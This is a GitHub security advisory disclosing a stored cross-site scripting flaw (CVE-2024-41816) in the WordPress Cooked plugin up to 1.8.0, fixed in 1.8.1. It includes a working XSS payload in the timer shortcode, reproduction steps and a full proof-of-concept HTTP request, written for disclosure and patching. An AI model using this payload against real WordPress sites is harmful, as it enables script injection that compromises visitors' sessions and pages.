Skip to content

WordPress Cooked Plugin <= 1.8.0 - Authenticated (Subscriber+) Persistent Cross-Site Scripting via Shortcode

Moderate
XjSv published GHSA-3gw3-2qjq-xqjj Aug 4, 2024

Package

No package listed

Affected versions

<= 1.8.0

Patched versions

1.8.1

Description

Description:

The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the ‘[cooked-timer]’ shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with subscriber-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page.

Payload:

[cooked-timer minutes="8" desc="XSS<img/src=z onerror=alert(origin);//"]8 Minutes[/cooked-timer]

Steps to reproduce:

[0] Install & activate the plugin.
[1] Add a recipe ‘/wp-admin/post-new.php?post_type=cp_recipe’.
[2] Use your payload in the Recipe Template text box.
[3] Publish the recipe.
[4] Injected payload will trigger on the newly created recipe page.

PoC request:

POST /wp-admin/post.php HTTP/1.1
Host: target.tld
Cookie: [subscriber_cookies]
Content-Length: 3520
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

_wpnonce=c3h1a3o3s7&user_ID=4&action=editpost&originalaction=editpost&post_author=4&post_type=cp_recipe&original_post_status=auto-draft&auto_draft=&post_ID=256&meta-box-order-nonce=c3h1a3o3s7&closedpostboxesnonce=c3h1a3o3s7&post_title=XSS+PoC&samplepermalinknonce=c3h1a3o3s7&content=&wp-preview=&original_publish=Submit+for+Review&publish=Submit+for+Review&tax_input%5Bcp_recipe_category%5D%5B%5D=0&_recipe_settings%5Bcooked_version%5D=1.8.0&_recipe_settings%5Bcontent%5D=%3Cp%3E%5Bcooked-timer+minutes%3D%228%22+desc%3D%22XSS%26lt%3Bimg%2Fsrc%3Dz+onerror%3Dalert%28origin%29%3B%2F%2F%22%5D8+Minutes%5B%2Fcooked-timer%5D%3C%2Fp%3E&_recipe_settings%5Bexcerpt%5D=&_recipe_settings%5Bseo_description%5D=&_recipe_settings%5Bdifficulty_level%5D=0&_recipe_settings%5Bprep_time%5D=&_recipe_settings%5Bcook_time%5D=&_recipe_settings%5Btotal_time%5D=&_recipe_settings%5Bingredients%5D%5B2542629%5D%5Bamount%5D=&_recipe_settings%5Bingredients%5D%5B2542629%5D%5Bmeasurement%5D=&_recipe_settings%5Bingredients%5D%5B2542629%5D%5Bname%5D=&_recipe_settings%5Bdirections%5D%5B1506110%5D%5Bimage%5D=&_recipe_settings%5Bdirections%5D%5B1506110%5D%5Bcontent%5D=&_recipe_settings%5Bnutrition%5D%5Bserving_size%5D=&_recipe_settings%5Bnutrition%5D%5Bservings%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bfat%5D=&_recipe_settings%5Bnutrition%5D%5Bsat_fat%5D=&_recipe_settings%5Bnutrition%5D%5Btrans_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bcholesterol%5D=&_recipe_settings%5Bnutrition%5D%5Bsodium%5D=&_recipe_settings%5Bnutrition%5D%5Bpotassium%5D=&_recipe_settings%5Bnutrition%5D%5Bcarbs%5D=&_recipe_settings%5Bnutrition%5D%5Bfiber%5D=&_recipe_settings%5Bnutrition%5D%5Bsugars%5D=&_recipe_settings%5Bnutrition%5D%5Bprotein%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_a%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_c%5D=&_recipe_settings%5Bnutrition%5D%5Bcalcium%5D=&_recipe_settings%5Bnutrition%5D%5Biron%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_d%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_e%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_k%5D=&_recipe_settings%5Bnutrition%5D%5Bthiamin%5D=&_recipe_settings%5Bnutrition%5D%5Briboflavin%5D=&_recipe_settings%5Bnutrition%5D%5Bniacin%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b6%5D=&_recipe_settings%5Bnutrition%5D%5Bfolate%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b12%5D=&_recipe_settings%5Bnutrition%5D%5Bbiotin%5D=&_recipe_settings%5Bnutrition%5D%5Bpantothenic_acid%5D=&_recipe_settings%5Bnutrition%5D%5Bphosphorus%5D=&_recipe_settings%5Bnutrition%5D%5Biodine%5D=&_recipe_settings%5Bnutrition%5D%5Bmagnesium%5D=&_recipe_settings%5Bnutrition%5D%5Bzinc%5D=&_recipe_settings%5Bnutrition%5D%5Bselenium%5D=&_recipe_settings%5Bnutrition%5D%5Bcopper%5D=&_recipe_settings%5Bnutrition%5D%5Bmanganese%5D=&_recipe_settings%5Bnutrition%5D%5Bchromium%5D=&_recipe_settings%5Bnutrition%5D%5Bmolybdenum%5D=&_recipe_settings%5Bnutrition%5D%5Bchloride%5D=&_recipe_settings%5Bgallery%5D%5Btype%5D=cooked&_recipe_settings%5Bgallery%5D%5Bvideo_url%5D=&cooked_recipe_custom_box_nonce=c3h1a3o3s7&advanced_view=1&comment_status=open&post_name=

PoC Screencast:

https://re-alter.ru/screencast/2024-07-wordpress-cooked-plugin-v1.8.0-auth-pxss-shortcode.gif

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CVE ID

CVE-2024-41816

Weaknesses

Credits